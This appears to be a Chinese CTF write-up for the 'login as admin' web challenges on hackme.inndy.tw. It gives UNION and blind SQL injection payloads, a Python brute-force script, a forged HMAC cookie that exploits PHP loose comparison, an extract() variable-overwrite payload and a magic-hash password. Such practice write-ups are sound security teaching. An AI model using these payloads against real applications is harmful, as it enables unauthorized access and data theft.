hackme.inndy.tw的19道web题解(中)

时间:2022-04-28
本文章向大家介绍hackme.inndy.tw的19道web题解(中),主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

目录

  • 写在前面
  • ......
  • login as admin 0
  • Login as Admin 0.1
  • login as admin 1.2
  • login as admin 3
  • login as admin 4
  • login as admin 6
  • login as admin 7
  • 待续...

写在前面

最近发现了一个比较有趣的ctf-oj,给出链接

https://hackme.inndy.tw/

里面有不少web题,我这里

因为依照出题人的要求:

本次文章不会直接给出flag,但是会有详细的分析和攻击脚本

0x08 login as admin 0.1

admin' union select 1,2,3,4#

发现2会回显

构造

admin' union select 1,database(),3,4#

数据库名login_as_admin0

故此

admin' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#

发现表名h1dden_f14g

admin' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x68316464656e5f66313467 limit 0,1),3,4#

发现字段名the_f14g

admin' union select 1,(select the_f14g from h1dden_f14g limit 0,1),3,4#

拿到flag

0x09 Login as Admin 1

关注过滤

php

function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
        strstr($strl, 'union select') || strstr($strl, 'select ')
    ) {
        return '';
    }
    return str_replace("'", "\'", $str);
}

多了个空格过滤,用/**/绕过即可,对于union select等过滤也十分不严谨,所以修改上题payload即可

admin'/**/or/**/1/**/limit/**/0,1#

即可

0x10 login as admin 1.2

这次union select不会回显了,选择盲注

但是太卡了……我就没跑……大致脚本如下,测试数据库名正常

python

import requests
url = "https://hackme.inndy.tw/login1/index.php"
flag = ""
for i in range(1,100):
    for j in range(33,127):
        payload = "admin\'/**/or/**/(ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1),%s,1))=%s)/**/limit/**/0,1#"%(i,j)
        data = {
            "name":payload,
            "password":"1"
        }
        r = requests.post(url=url,data=data)
        if "You are not admin!" in r.content:
            flag += chr(j)
            print flag
            break

0x11 login as admin 3

关键代码

php

function load_user()
{
    global $secret, $error;
    if(empty($_COOKIE['user'])) {
        return null;
    }
    $unserialized = json_decode(base64_decode($_COOKIE['user']), true);
    $r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];
    if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
        $error = 'Invalid session';
        return false;
    }
    $data = json_decode($unserialized['data'], true);
    return [
        'name' => $data[0],
        'admin' => $data[1]
    ];
}

发现存在弱比较:

我们只要构造出sig=0即可轻松绕过消息认证码检测:

hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']

所以构造如下:

php

function set_user()
{
    $user = ['admin',true];
    $data = json_encode($user);
    $sig = 0;
    $all = base64_encode(json_encode(['sig' => $sig, 'data' => $data]));
    echo $all;
}
set_user();

所以cookie里添加user=eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0=刷新即可得到flag

0x12 login as admin 4

代码逻辑问题,用户名为admin直接可以成功

直接curl -d "name=admin" https://hackme.inndy.tw/login4/

即可获取flag

0x13 login as admin 6

发现关键代码

php

if(!empty($_POST['data'])) {
    try {
        $data = json_decode($_POST['data'], true);
    } catch (Exception $e) {
        $data = [];
    }
    extract($data);
    if($users[$username] && strcmp($users[$username], $password) == 0) {
        $user = $username;
    }
}

其中可以变量覆盖:

extract($data);

所以我们构造:

data = {"users":{"admin":"sky"},"username":"admin","password":"sky"}

即可绕过,并且成功登陆

0x014 login as admin 7

0e开头的md5弱比较

选择:

name = admin

password = QNKCDZO

即可

随机文章
本站知识点必读
最近更新